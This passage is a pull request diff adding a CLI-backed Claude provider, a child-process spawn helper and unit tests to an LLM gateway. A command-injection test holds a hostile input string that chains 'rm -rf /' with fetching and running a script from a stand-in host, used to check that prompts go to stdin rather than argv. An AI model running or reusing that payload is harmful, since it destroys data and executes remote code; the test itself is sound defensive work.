### PR TITLE
feat(gateway): Claude via local CLI subscription by default (#347)

### DIFF
--- a/server/config/schema.ts
+++ b/server/config/schema.ts
@@ -34,7 +34,13 @@ export const ConfigSchema = z.object({
     }).default({}),
   }).default({}),
   providers: z.object({
-    anthropic: z.object({ apiKey: z.string().optional() }).default({}),
+    anthropic: z.object({
+      apiKey: z.string().optional(),
+      // "cli" (default) routes Claude through the local `claude` CLI
+      // subscription (0 API tokens). "api" uses the paid Anthropic API and
+      // requires apiKey — opt-in only.
+      mode: z.enum(["cli", "api"]).default("cli"),
+    }).default({}),
     google: z.object({ apiKey: z.string().optional() }).default({}),
     xai: z.object({ apiKey: z.string().optional() }).default({}),
     vllm: z.object({ endpoint: z.string().url().optional() }).default({}),

--- a/server/gateway/index.ts
+++ b/server/gateway/index.ts
@@ -5,6 +5,7 @@ import { MockProvider } from "./providers/mock";
 import { VllmProvider } from "./providers/vllm";
 import { OllamaProvider } from "./providers/ollama";
 import { ClaudeProvider } from "./providers/claude";
+import { ClaudeCliProvider } from "./providers/claude-cli";
 import { GeminiProvider } from "./providers/gemini";
 import { GrokProvider } from "./providers/grok";
 import { LmStudioProvider } from "./providers/lmstudio";
@@ -58,16 +59,33 @@ export class Gateway {
       this.registry.set("lmstudio", new LmStudioProvider(lmStudioEndpoint));
     }
 
-    // Cloud: API-key-gated (config values; DB keys loaded later via loadDbKeys())
-    if (providers.anthropic.apiKey) {
-      this.registry.set("anthropic", new ClaudeProvider(providers.anthropic.apiKey));
-    }
+    // Anthropic: CLI subscription by default (0 API tokens). The paid API path
+    // is opt-in via providers.anthropic.mode === "api" AND a configured apiKey.
+    this.registerAnthropic(providers.anthropic.apiKey);
     if (providers.google.apiKey) {
       this.registry.set("google", new GeminiProvider(providers.google.apiKey));
     }
     if (providers.xai.apiKey) {
       this.registry.set("xai", new GrokProvider(providers.xai.apiKey));
     }
+  }
+
+  /**
+   * Register the Anthropic provider under the "anthropic" key.
+   *
+   * Default = CLI subscription (ClaudeCliProvider) → 0 API tokens, no Anthropic
+   * SDK instantiated, ANTHROPIC_API_KEY not required. The paid API provider
+   * (ClaudeProvider via @anthropic-ai/sdk) is used ONLY when both
+   * providers.anthropic.mode === "api" and an apiKey are present. This keeps the
+   * SDK out of the default hot path entirely.
+   */
+  private registerAnthropic(apiKey: string | null | undefined): void {
+    const mode = configLoader.get().providers.anthropic.mode;
+    if (mode === "api" && apiKey) {
+      this.registry.set("anthropic", new ClaudeProvider(apiKey));
+      return;
+    }
+    this.registry.set("anthropic", new ClaudeCliProvider());
   }
 
   /**
@@ -88,7 +106,13 @@ export class Gateway {
    */
   async reloadProvider(provider: CloudProviderKey, apiKey: string | null): Promise<void> {
     if (!apiKey) {
-      // Only remove if not backed by a config value
+      // Anthropic always falls back to the CLI subscription provider — it needs
+      // no API key, so it is never removed, only downgraded from API → CLI.
+      if (provider === "anthropic") {
+        this.registerAnthropic(null);
+        return;
+      }
+      // Other providers: only remove if not backed by a config value.
       const providers = configLoader.get().providers;
       const configKeys: Record<CloudProviderKey, string | undefined> = {
         anthropic: providers.anthropic.apiKey,
@@ -103,7 +127,7 @@ export class Gateway {
 
     switch (provider) {
       case "anthropic":
-        this.registry.set("anthropic", new ClaudeProvider(apiKey));
+        this.registerAnthropic(apiKey);
         break;
       case "google":
         this.registry.set("google", new GeminiProvider(apiKey));

--- a/server/gateway/providers/claude-cli.ts
+++ b/server/gateway/providers/claude-cli.ts
@@ -1,0 +1,189 @@
+/**
+ * Subscription-backed Claude provider.
+ *
+ * Invokes the locally installed `claude` CLI non-interactively
+ * (`claude -p --output-format json`) so requests run against the user's logged-in
+ * Claude Code subscription instead of the paid Anthropic API. The `@anthropic-ai/sdk`
+ * is never imported here, and `ANTHROPIC_API_KEY` is never read → 0 calls to
+ * api.anthropic.com in this mode.
+ *
+ * The prompt is fed to the CLI via stdin (never as a shell-expanded argv element),
+ * and all flags are passed as an argument array, so message content cannot inject
+ * shell commands.
+ */
+import type {
+  ILLMProvider,
+  ILLMProviderOptions,
+  ProviderMessage,
+  ToolCall,
+} from "@shared/types";
+import {
+  ConcurrencyLimiter,
+  spawnCli,
+  streamCliLines,
+  type CliSpawnRequest,
+} from "./cli-spawn";
+
+const DEFAULT_BINARY = "claude";
+const DEFAULT_TIMEOUT_MS = 120_000;
+const DEFAULT_MAX_CONCURRENCY = 4;
+const ERROR_PREVIEW_CHARS = 200;
+
+interface ClaudeCliResult {
+  type: string;
+  subtype?: string;
+  is_error?: boolean;
+  result?: string;
+  usage?: { input_tokens?: number; output_tokens?: number };
+}
+
+interface ClaudeCliAssistantEvent {
+  type: "assistant";
+  message?: { content?: Array<{ type: string; text?: string }> };
+}
+
+export interface ClaudeCliOptions {
+  /** Binary name or absolute path. Defaults to "claude". */
+  binary?: string;
+  /** Max concurrent CLI processes. */
+  maxConcurrency?: number;
+}
+
+/** Render ProviderMessage[] into a single plain-text prompt for the CLI. */
+function renderPrompt(messages: ProviderMessage[]): string {
+  return messages
+    .filter((m) => m.role !== "system")
+    .map((m) => {
+      if (m.role === "tool") return `[tool:${m.toolCallId}]\n${m.content}`;
+      return `${m.role === "assistant" ? "Assistant" : "User"}: ${m.content}`;
+    })
+    .join("\n\n");
+}
+
+/** Join all system messages into one system prompt, or undefined if none. */
+function extractSystem(messages: ProviderMessage[]): string | undefined {
+  const parts = messages.filter((m) => m.role === "system").map((m) => m.content);
+  return parts.length > 0 ? parts.join("\n") : undefined;
+}
+
+/** Parse a single line of JSONL, returning null when the line is not valid JSON. */
+function parseLine(line: string): Record<string, unknown> | null {
+  const trimmed = line.trim();
+  if (trimmed.length === 0) return null;
+  try {
+    return JSON.parse(trimmed) as Record<string, unknown>;
+  } catch {
+    return null;
+  }
+}
+
+/** Extract concatenated text from an `assistant` stream event's content blocks. */
+function assistantText(event: ClaudeCliAssistantEvent): string {
+  const blocks = event.message?.content ?? [];
+  return blocks
+    .filter((b) => b.type === "text" && typeof b.text === "string")
+    .map((b) => b.text as string)
+    .join("");
+}
+
+/** Parse the single JSON object emitted by `--output-format json`. */
+export function parseCompleteOutput(stdout: string): {
+  content: string;
+  tokensUsed: number;
+  finishReason: "stop";
+} {
+  const parsed = parseLine(stdout);
+  if (!parsed) {
+    throw new Error(
+      `[claude-cli] Could not parse CLI output as JSON: ${stdout.slice(0, ERROR_PREVIEW_CHARS)}`,
+    );
+  }
+  const result = parsed as unknown as ClaudeCliResult;
+  if (result.is_error === true) {
+    throw new Error(`[claude-cli] CLI reported an error: ${result.result ?? "unknown error"}`);
+  }
+  const content = typeof result.result === "string" ? result.result : "";
+  const usage = result.usage ?? {};
+  const tokensUsed = (usage.input_tokens ?? 0) + (usage.output_tokens ?? 0);
+  return { content, tokensUsed, finishReason: "stop" };
+}
+
+export class ClaudeCliProvider implements ILLMProvider {
+  private readonly binary: string;
+  private readonly limiter: ConcurrencyLimiter;
+
+  constructor(options?: ClaudeCliOptions) {
+    this.binary = options?.binary ?? DEFAULT_BINARY;
+    this.limiter = new ConcurrencyLimiter(
+      options?.maxConcurrency ?? DEFAULT_MAX_CONCURRENCY,
+    );
+  }
+
+  private baseArgs(
+    modelId: string,
+    messages: ProviderMessage[],
+    format: "json" | "stream-json",
+  ): string[] {
+    const args = ["-p", "--output-format", format, "--model", modelId];
+    if (format === "stream-json") args.push("--verbose");
+    const system = extractSystem(messages);
+    if (system) args.push("--system-prompt", system);
+    return args;
+  }
+
+  private buildRequest(
+    args: string[],
+    messages: ProviderMessage[],
+    options?: ILLMProviderOptions,
+  ): CliSpawnRequest {
+    return {
+      binary: this.binary,
+      args,
+      stdin: renderPrompt(messages),
+      timeoutMs: options?.timeoutMs ?? DEFAULT_TIMEOUT_MS,
+    };
+  }
+
+  async complete(
+    modelId: string,
+    messages: ProviderMessage[],
+    options?: ILLMProviderOptions,
+  ): Promise<{
+    content: string;
+    tokensUsed: number;
+    toolCalls?: ToolCall[];
+    finishReason?: "stop" | "tool_use";
+  }> {
+    const args = this.baseArgs(modelId, messages, "json");
+    const request = this.buildRequest(args, messages, options);
+    const { stdout } = await this.limiter.run(() => spawnCli(request));
+    return parseCompleteOutput(stdout);
+  }
+
+  async *stream(
+    modelId: string,
+    messages: ProviderMessage[],
+    options?: ILLMProviderOptions,
+  ): AsyncGenerator<string> {
+    const args = this.baseArgs(modelId, messages, "stream-json");
+    const request = this.buildRequest(args, messages, options);
+    yield* this.iterateStream(request);
+  }
+
+  /** Convert JSONL `assistant` events into incremental text deltas. */
+  private async *iterateStream(request: CliSpawnRequest): AsyncGenerator<string> {
+    let previous = "";
+    for await (const line of streamCliLines(request)) {
+      const parsed = parseLine(line);
+      if (!parsed || parsed.type !== "assistant") continue;
+      const full = assistantText(parsed as unknown as ClaudeCliAssistantEvent);
+      if (full.length === 0 || full === previous) continue;
+      if (full.startsWith(previous)) {
+        yield full.slice(previous.length);
+      } else {
+        yield full;
+      }
+      previous = full;
+    }
+  }
+}

--- a/server/gateway/providers/cli-spawn.ts
+++ b/server/gateway/providers/cli-spawn.ts
@@ -1,0 +1,277 @@
+/**
+ * Small, self-contained helper for CLI-backed LLM providers that shell out to a
+ * locally installed binary (e.g. the `claude` CLI for subscription-based access).
+ *
+ * Responsibilities kept intentionally narrow so sibling CLI providers (issue
+ * #348, Antigravity CLI) can reuse it after merge:
+ *   - Spawn a binary with an ARGUMENT ARRAY (never a shell string) → no command
+ *     injection. The prompt is written to the child's stdin, never passed as an
+ *     argv element.
+ *   - Enforce a per-process timeout and honour an optional AbortSignal.
+ *   - Cap the number of concurrently running child processes.
+ *   - Surface a clear, typed error when the binary is missing (ENOENT).
+ */
+import { spawn } from "node:child_process";
+
+const DEFAULT_MAX_CONCURRENCY = 4;
+const DEFAULT_TIMEOUT_MS = 120_000;
+const SIGKILL_GRACE_MS = 2_000;
+
+/** Thrown when the underlying CLI binary is not installed / not on PATH. */
+export class CliNotInstalledError extends Error {
+  constructor(binary: string) {
+    super(`CLI binary "${binary}" is not installed or not on PATH`);
+    this.name = "CliNotInstalledError";
+  }
+}
+
+/** Thrown when the CLI exits non-zero, times out, or is aborted. */
+export class CliExecutionError extends Error {
+  constructor(
+    message: string,
+    readonly exitCode: number | null,
+    readonly stderr: string,
+  ) {
+    super(message);
+    this.name = "CliExecutionError";
+  }
+}
+
+export interface CliSpawnRequest {
+  /** Binary name or absolute path (e.g. "claude"). */
+  binary: string;
+  /** Argument array — each element passed verbatim, never shell-expanded. */
+  args: string[];
+  /** Data written to the child's stdin, then closed. */
+  stdin: string;
+  /** Per-process timeout in milliseconds. */
+  timeoutMs?: number;
+  /** Cancels the child when aborted. */
+  signal?: AbortSignal;
+  /** Extra env vars merged over process.env. */
+  env?: Record<string, string>;
+}
+
+export interface CliSpawnResult {
+  stdout: string;
+  stderr: string;
+  exitCode: number;
+}
+
+/** Bounded gate that limits how many child processes run at once. */
+export class ConcurrencyLimiter {
+  private active = 0;
+  private readonly queue: Array<() => void> = [];
+
+  constructor(private readonly max: number = DEFAULT_MAX_CONCURRENCY) {}
+
+  async run<T>(task: () => Promise<T>): Promise<T> {
+    await this.acquire();
+    try {
+      return await task();
+    } finally {
+      this.release();
+    }
+  }
+
+  private acquire(): Promise<void> {
+    if (this.active < this.max) {
+      this.active += 1;
+      return Promise.resolve();
+    }
+    return new Promise<void>((resolve) => this.queue.push(resolve));
+  }
+
+  private release(): void {
+    const next = this.queue.shift();
+    if (next) {
+      next();
+      return;
+    }
+    this.active -= 1;
+  }
+}
+
+function rejectOnSpawnError(
+  binary: string,
+  reject: (e: Error) => void,
+): (err: NodeJS.ErrnoException) => void {
+  return (err) => {
+    if (err.code === "ENOENT") {
+      reject(new CliNotInstalledError(binary));
+      return;
+    }
+    reject(new CliExecutionError(`Failed to spawn "${binary}": ${err.message}`, null, ""));
+  };
+}
+
+function settleClose(
+  code: number | null,
+  stdout: string,
+  stderr: string,
+  resolve: (r: CliSpawnResult) => void,
+  reject: (e: Error) => void,
+): void {
+  if (code === 0) {
+    resolve({ stdout, stderr, exitCode: 0 });
+    return;
+  }
+  reject(
+    new CliExecutionError(
+      `CLI exited with code ${code ?? "null"}${stderr ? `: ${stderr.trim()}` : ""}`,
+      code,
+      stderr,
+    ),
+  );
+}
+
+/**
+ * Spawn a CLI process, feed `stdin`, and resolve with its captured output.
+ * Buffers stdout/stderr in memory — intended for bounded CLI responses.
+ */
+export function spawnCli(request: CliSpawnRequest): Promise<CliSpawnResult> {
+  const timeoutMs = request.timeoutMs ?? DEFAULT_TIMEOUT_MS;
+
+  return new Promise<CliSpawnResult>((resolve, reject) => {
+    const child = spawn(request.binary, request.args, {
+      env: { ...process.env, ...request.env },
+      stdio: ["pipe", "pipe", "pipe"],
+    });
+
+    let stdout = "";
+    let stderr = "";
+    let settled = false;
+
+    const finish = (fn: () => void): void => {
+      if (settled) return;
+      settled = true;
+      clearTimeout(timer);
+      request.signal?.removeEventListener("abort", onAbort);
+      fn();
+    };
+
+    const onAbort = (): void => {
+      child.kill("SIGTERM");
+      finish(() => reject(new CliExecutionError("CLI request aborted", null, stderr)));
+    };
+
+    const timer = setTimeout(() => {
+      child.kill("SIGTERM");
+      setTimeout(() => child.kill("SIGKILL"), SIGKILL_GRACE_MS);
+      finish(() =>
+        reject(new CliExecutionError(`CLI timed out after ${timeoutMs}ms`, null, stderr)),
+      );
+    }, timeoutMs);
+
+    request.signal?.addEventListener("abort", onAbort, { once: true });
+    child.on("error", (err: NodeJS.ErrnoException) =>
+      finish(() => rejectOnSpawnError(request.binary, reject)(err)),
+    );
+    child.stdout.on("data", (chunk: Buffer) => (stdout += chunk.toString()));
+    child.stderr.on("data", (chunk: Buffer) => (stderr += chunk.toString()));
+    child.on("close", (code) =>
+      finish(() => settleClose(code, stdout, stderr, resolve, reject)),
+    );
+
+    child.stdin.end(request.stdin);
+  });
+}
+
+/**
+ * Spawn a CLI process and yield its stdout split into complete lines as they
+ * arrive. Used for `--output-format stream-json` (JSONL). The child is killed
+ * on abort/timeout; a non-zero exit after streaming rejects the generator.
+ */
+export async function* streamCliLines(
+  request: CliSpawnRequest,
+): AsyncGenerator<string> {
+  const timeoutMs = request.timeoutMs ?? DEFAULT_TIMEOUT_MS;
+  const child = spawn(request.binary, request.args, {
+    env: { ...process.env, ...request.env },
+    stdio: ["pipe", "pipe", "pipe"],
+  });
+
+  const queue: string[] = [];
+  let buffer = "";
+  let stderr = "";
+  let done = false;
+  let failure: Error | null = null;
+  let wake: (() => void) | null = null;
+
+  const signalReady = (): void => {
+    if (wake) {
+      const fn = wake;
+      wake = null;
+      fn();
+    }
+  };
+
+  const fail = (err: Error): void => {
+    failure = err;
+    done = true;
+    signalReady();
+  };
+
+  const timer = setTimeout(() => {
+    child.kill("SIGTERM");
+    setTimeout(() => child.kill("SIGKILL"), SIGKILL_GRACE_MS);
+    fail(new CliExecutionError(`CLI timed out after ${timeoutMs}ms`, null, stderr));
+  }, timeoutMs);
+
+  const onAbort = (): void => {
+    child.kill("SIGTERM");
+    fail(new CliExecutionError("CLI request aborted", null, stderr));
+  };
+  request.signal?.addEventListener("abort", onAbort, { once: true });
+
+  child.stderr.on("data", (chunk: Buffer) => (stderr += chunk.toString()));
+  child.stdout.on("data", (chunk: Buffer) => {
+    buffer += chunk.toString();
+    let idx = buffer.indexOf("\n");
+    while (idx !== -1) {
+      queue.push(buffer.slice(0, idx));
+      buffer = buffer.slice(idx + 1);
+      idx = buffer.indexOf("\n");
+    }
+    signalReady();
+  });
+  child.on("error", (err: NodeJS.ErrnoException) =>
+    fail(
+      err.code === "ENOENT"
+        ? new CliNotInstalledError(request.binary)
+        : new CliExecutionError(`Failed to spawn "${request.binary}": ${err.message}`, null, ""),
+    ),
+  );
+  child.on("close", (code) => {
+    if (buffer.length > 0) {
+      queue.push(buffer);
+      buffer = "";
+    }
+    if (code !== 0 && code !== null) {
+      failure = new CliExecutionError(
+        `CLI exited with code ${code}${stderr ? `: ${stderr.trim()}` : ""}`,
+        code,
+        stderr,
+      );
+    }
+    done = true;
+    signalReady();
+  });
+
+  child.stdin.end(request.stdin);
+
+  try {
+    while (true) {
+      while (queue.length > 0) {
+        yield queue.shift() as string;
+      }
+      if (done) break;
+      await new Promise<void>((resolve) => (wake = resolve));
+    }
+    if (failure) throw failure;
+  } finally {
+    clearTimeout(timer);
+    request.signal?.removeEventListener("abort", onAbort);
+    if (!child.killed) child.kill("SIGTERM");
+  }
+}

--- a/tests/unit/gateway-anthropic-mode.test.ts
+++ b/tests/unit/gateway-anthropic-mode.test.ts
@@ -1,0 +1,108 @@
+/**
+ * Gateway-level test for the Anthropic provider selection (issue #347).
+ *
+ * Verifies that:
+ *   - Default mode registers the CLI subscription provider (ClaudeCliProvider)
+ *     and NEVER constructs the Anthropic SDK provider (ClaudeProvider) →
+ *     0 calls to api.anthropic.com.
+ *   - "api" mode WITH an apiKey constructs the SDK provider.
+ *   - "api" mode WITHOUT a key still falls back to the CLI provider.
+ *
+ * All provider modules and the config loader are mocked; no real network or
+ * child-process activity occurs.
+ */
+import { describe, it, expect, vi, beforeEach } from "vitest";
+
+const claudeCliCtor = vi.fn();
+const claudeApiCtor = vi.fn();
+const getConfig = vi.fn();
+
+vi.mock("../../server/gateway/providers/claude-cli", () => ({
+  ClaudeCliProvider: class {
+    constructor(...args: unknown[]) {
+      claudeCliCtor(...args);
+    }
+  },
+}));
+
+vi.mock("../../server/gateway/providers/claude", () => ({
+  ClaudeProvider: class {
+    constructor(...args: unknown[]) {
+      claudeApiCtor(...args);
+    }
+  },
+}));
+
+// Stub the remaining provider modules so the Gateway constructor stays cheap.
+vi.mock("../../server/gateway/providers/mock", () => ({ MockProvider: class {} }));
+vi.mock("../../server/gateway/providers/vllm", () => ({ VllmProvider: class {} }));
+vi.mock("../../server/gateway/providers/ollama", () => ({ OllamaProvider: class {} }));
+vi.mock("../../server/gateway/providers/gemini", () => ({ GeminiProvider: class {} }));
+vi.mock("../../server/gateway/providers/grok", () => ({ GrokProvider: class {} }));
+vi.mock("../../server/gateway/providers/lmstudio", () => ({ LmStudioProvider: class {} }));
+vi.mock("../../server/privacy/anonymizer", () => ({ AnonymizerService: class {} }));
+vi.mock("../../server/services/cost-service", () => ({ CostService: class {} }));
+vi.mock("../../server/tools/index", () => ({ toolRegistry: {} }));
+
+vi.mock("../../server/config/loader", () => ({
+  configLoader: { get: () => getConfig() },
+}));
+
+import { Gateway } from "../../server/gateway/index.js";
+import type { IStorage } from "../../server/storage.js";
+
+const storage = {} as IStorage;
+
+function configWith(anthropic: { apiKey?: string; mode: "cli" | "api" }) {
+  return {
+    providers: {
+      anthropic,
+      google: {},
+      xai: {},
+      vllm: {},
+      ollama: {},
+      lmstudio: {},
+      tavily: {},
+    },
+  };
+}
+
+describe("Gateway — Anthropic provider selection", () => {
+  beforeEach(() => vi.clearAllMocks());
+
+  it("default mode uses the CLI provider and never constructs the SDK provider", () => {
+    getConfig.mockReturnValue(configWith({ mode: "cli" }));
+
+    new Gateway(storage);
+
+    expect(claudeCliCtor).toHaveBeenCalledTimes(1);
+    expect(claudeApiCtor).not.toHaveBeenCalled();
+  });
+
+  it("default mode ignores a present apiKey and still uses the CLI provider", () => {
+    getConfig.mockReturnValue(configWith({ mode: "cli", apiKey: "sk-ant-xxx" }));
+
+    new Gateway(storage);
+
+    expect(claudeCliCtor).toHaveBeenCalledTimes(1);
+    expect(claudeApiCtor).not.toHaveBeenCalled();
+  });
+
+  it("api mode with a key constructs the SDK provider", () => {
+    getConfig.mockReturnValue(configWith({ mode: "api", apiKey: "sk-ant-xxx" }));
+
+    new Gateway(storage);
+
+    expect(claudeApiCtor).toHaveBeenCalledWith("sk-ant-xxx");
+    expect(claudeCliCtor).not.toHaveBeenCalled();
+  });
+
+  it("api mode without a key falls back to the CLI provider", () => {
+    getConfig.mockReturnValue(configWith({ mode: "api" }));
+
+    new Gateway(storage);
+
+    expect(claudeCliCtor).toHaveBeenCalledTimes(1);
+    expect(claudeApiCtor).not.toHaveBeenCalled();
+  });
+});

--- a/tests/unit/gateway.test.ts
+++ b/tests/unit/gateway.test.ts
@@ -193,7 +193,9 @@ describe("MockProvider", () => {
 
 describe("Gateway.testProvider()", () => {
   it("throws when provider is not registered", async () => {
-    // Minimal Gateway stub with empty registry
+    // Minimal Gateway stub with empty registry.
+    // NOTE: "anthropic" is always registered now (CLI subscription provider is
+    // the default — issue #347), so we probe an unconfigured key instead.
     const { Gateway } = await import("../../server/gateway/index.js");
     const fakeStorage = {
       getModelBySlug: async () => null,
@@ -201,7 +203,7 @@ describe("Gateway.testProvider()", () => {
     } as unknown as import("../../server/storage.js").IStorage;
 
     const gw = new Gateway(fakeStorage);
-    await expect(gw.testProvider("anthropic")).rejects.toThrow("Provider not configured");
+    await expect(gw.testProvider("xai")).rejects.toThrow("Provider not configured");
   });
 
   it("calls the real provider's complete() — does NOT fall back to MockProvider", async () => {

--- a/tests/unit/providers/claude-cli.test.ts
+++ b/tests/unit/providers/claude-cli.test.ts
@@ -1,0 +1,354 @@
+/**
+ * Unit tests for the subscription-backed ClaudeCliProvider.
+ *
+ * `node:child_process` is fully mocked — no real `claude` CLI is invoked. The
+ * `@anthropic-ai/sdk` is also mocked with a constructor spy so we can assert it
+ * is NEVER instantiated in CLI mode → 0 calls to api.anthropic.com.
+ *
+ * Coverage:
+ *   - complete(): parses `--output-format json`, sums tokens, builds safe argv.
+ *   - Command-injection safety: message content goes to stdin, never argv.
+ *   - Malformed / error JSON output → clear thrown error.
+ *   - Missing CLI binary (ENOENT) → CliNotInstalledError.
+ *   - stream(): parses stream-json `assistant` events into text deltas.
+ *   - Anthropic SDK constructor is never called in CLI mode.
+ */
+import { EventEmitter } from "node:events";
+import { describe, it, expect, vi, beforeEach } from "vitest";
+
+// ─── Mocks (declared before importing the provider) ──────────────────────────
+
+const spawnMock = vi.fn();
+const anthropicCtor = vi.fn();
+
+vi.mock("node:child_process", () => ({
+  spawn: (...args: unknown[]) => spawnMock(...args),
+}));
+
+vi.mock("@anthropic-ai/sdk", () => {
+  class MockAnthropic {
+    constructor(opts: unknown) {
+      anthropicCtor(opts);
+    }
+  }
+  return { default: MockAnthropic };
+});
+
+import {
+  ClaudeCliProvider,
+  parseCompleteOutput,
+} from "../../../server/gateway/providers/claude-cli.js";
+import { CliNotInstalledError } from "../../../server/gateway/providers/cli-spawn.js";
+import type { ProviderMessage } from "../../../shared/types.js";
+
+// ─── Helpers ─────────────────────────────────────────────────────────────────
+
+interface FakeChild extends EventEmitter {
+  stdout: EventEmitter;
+  stderr: EventEmitter;
+  stdin: { end: (data: string) => void };
+  kill: (signal?: string) => boolean;
+  killed: boolean;
+}
+
+function makeChild(): FakeChild {
+  const child = new EventEmitter() as FakeChild;
+  child.stdout = new EventEmitter();
+  child.stderr = new EventEmitter();
+  child.killed = false;
+  child.kill = vi.fn(() => {
+    child.killed = true;
+    return true;
+  });
+  child.stdin = { end: vi.fn() };
+  return child;
+}
+
+/** Drive a fake child to emit stdout then close with the given exit code. */
+function emitAndClose(child: FakeChild, stdout: string, code = 0): void {
+  setImmediate(() => {
+    if (stdout) child.stdout.emit("data", Buffer.from(stdout));
+    child.emit("close", code);
+  });
+}
+
+function stdinOf(child: FakeChild): string {
+  return (child.stdin.end as ReturnType<typeof vi.fn>).mock.calls[0][0] as string;
+}
+
+const JSON_OK = JSON.stringify({
+  type: "result",
+  subtype: "success",
+  is_error: false,
+  result: "pong",
+  usage: { input_tokens: 12, output_tokens: 3 },
+});
+
+const USER_MSG: ProviderMessage[] = [{ role: "user", content: "say pong" }];
+
+const SYSTEM_AND_USER: ProviderMessage[] = [
+  { role: "system", content: "You are terse." },
+  { role: "user", content: "say pong" },
+];
+
+// ─── parseCompleteOutput ─────────────────────────────────────────────────────
+
+describe("parseCompleteOutput", () => {
+  it("extracts content and sums input + output tokens", () => {
+    const out = parseCompleteOutput(JSON_OK);
+    expect(out.content).toBe("pong");
+    expect(out.tokensUsed).toBe(15);
+    expect(out.finishReason).toBe("stop");
+  });
+
+  it("throws a clear error on malformed (non-JSON) output", () => {
+    expect(() => parseCompleteOutput("not json at all")).toThrow(/Could not parse/i);
+  });
+
+  it("throws when the CLI reports is_error: true", () => {
+    const errJson = JSON.stringify({
+      type: "result",
+      is_error: true,
+      result: "Not logged in · Please run /login",
+    });
+    expect(() => parseCompleteOutput(errJson)).toThrow(/Not logged in/i);
+  });
+
+  it("defaults tokensUsed to 0 when usage is absent", () => {
+    const out = parseCompleteOutput(JSON.stringify({ type: "result", result: "hi" }));
+    expect(out.tokensUsed).toBe(0);
+  });
+});
+
+// ─── complete() ──────────────────────────────────────────────────────────────
+
+describe("ClaudeCliProvider — complete()", () => {
+  let provider: ClaudeCliProvider;
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+    provider = new ClaudeCliProvider();
+  });
+
+  it("returns parsed content and token total", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      emitAndClose(child, JSON_OK);
+      return child;
+    });
+
+    const result = await provider.complete("claude-sonnet", USER_MSG);
+
+    expect(result.content).toBe("pong");
+    expect(result.tokensUsed).toBe(15);
+  });
+
+  it("builds a safe argv: -p, json format, model; never the message content", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      emitAndClose(child, JSON_OK);
+      return child;
+    });
+
+    await provider.complete("claude-sonnet", USER_MSG);
+
+    const [binary, args] = spawnMock.mock.calls[0] as [string, string[]];
+    expect(binary).toBe("claude");
+    expect(args).toEqual(["-p", "--output-format", "json", "--model", "claude-sonnet"]);
+    // The user message must NOT appear anywhere in argv (injection guard).
+    expect(args.join(" ")).not.toContain("say pong");
+  });
+
+  it("passes the rendered prompt via stdin, not via argv", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      emitAndClose(child, JSON_OK);
+      return child;
+    });
+
+    await provider.complete("claude-sonnet", USER_MSG);
+
+    expect(child.stdin.end).toHaveBeenCalledTimes(1);
+    expect(stdinOf(child)).toContain("say pong");
+  });
+
+  it("does not interpolate shell metacharacters — content stays in stdin", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      emitAndClose(child, JSON_OK);
+      return child;
+    });
+    const malicious: ProviderMessage[] = [
+      { role: "user", content: "; rm -rf / && curl evil.sh | sh `whoami`" },
+    ];
+
+    await provider.complete("claude-sonnet", malicious);
+
+    const [, args] = spawnMock.mock.calls[0] as [string, string[]];
+    expect(args.join(" ")).not.toContain("rm -rf");
+    expect(stdinOf(child)).toContain("rm -rf");
+  });
+
+  it("forwards the system prompt as a --system-prompt arg", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      emitAndClose(child, JSON_OK);
+      return child;
+    });
+
+    await provider.complete("claude-sonnet", SYSTEM_AND_USER);
+
+    const [, args] = spawnMock.mock.calls[0] as [string, string[]];
+    const idx = args.indexOf("--system-prompt");
+    expect(idx).toBeGreaterThan(-1);
+    expect(args[idx + 1]).toBe("You are terse.");
+  });
+
+  it("surfaces CliNotInstalledError when the binary is missing (ENOENT)", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        const err = Object.assign(new Error("spawn claude ENOENT"), { code: "ENOENT" });
+        child.emit("error", err);
+      });
+      return child;
+    });
+
+    await expect(provider.complete("claude-sonnet", USER_MSG)).rejects.toBeInstanceOf(
+      CliNotInstalledError,
+    );
+  });
+
+  it("rejects with the CLI error message on a non-zero exit", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stderr.emit("data", Buffer.from("boom"));
+        child.emit("close", 1);
+      });
+      return child;
+    });
+
+    await expect(provider.complete("claude-sonnet", USER_MSG)).rejects.toThrow(/boom|code 1/i);
+  });
+
+  it("throws on malformed JSON stdout even with a clean exit", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      emitAndClose(child, "{ not valid json");
+      return child;
+    });
+
+    await expect(provider.complete("claude-sonnet", USER_MSG)).rejects.toThrow(/Could not parse/i);
+  });
+});
+
+// ─── stream() ────────────────────────────────────────────────────────────────
+
+describe("ClaudeCliProvider — stream()", () => {
+  let provider: ClaudeCliProvider;
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+    provider = new ClaudeCliProvider();
+  });
+
+  function assistantLine(text: string): string {
+    return (
+      JSON.stringify({
+        type: "assistant",
+        message: { content: [{ type: "text", text }] },
+      }) + "\n"
+    );
+  }
+
+  async function collect(messages: ProviderMessage[]): Promise<string[]> {
+    const chunks: string[] = [];
+    for await (const chunk of provider.stream("claude-sonnet", messages)) {
+      chunks.push(chunk);
+    }
+    return chunks;
+  }
+
+  it("yields text from assistant events and ignores non-assistant lines", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stdout.emit("data", Buffer.from('{"type":"system","subtype":"init"}\n'));
+        child.stdout.emit("data", Buffer.from(assistantLine("Hello world")));
+        child.emit("close", 0);
+      });
+      return child;
+    });
+
+    expect((await collect(USER_MSG)).join("")).toBe("Hello world");
+  });
+
+  it("emits incremental deltas when assistant text grows across events", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stdout.emit("data", Buffer.from(assistantLine("Hello")));
+        child.stdout.emit("data", Buffer.from(assistantLine("Hello world")));
+        child.emit("close", 0);
+      });
+      return child;
+    });
+
+    expect(await collect(USER_MSG)).toEqual(["Hello", " world"]);
+  });
+
+  it("skips malformed JSONL lines without throwing", async () => {
+    const child = makeChild();
+    spawnMock.mockImplementation(() => {
+      setImmediate(() => {
+        child.stdout.emit("data", Buffer.from("not-json\n"));
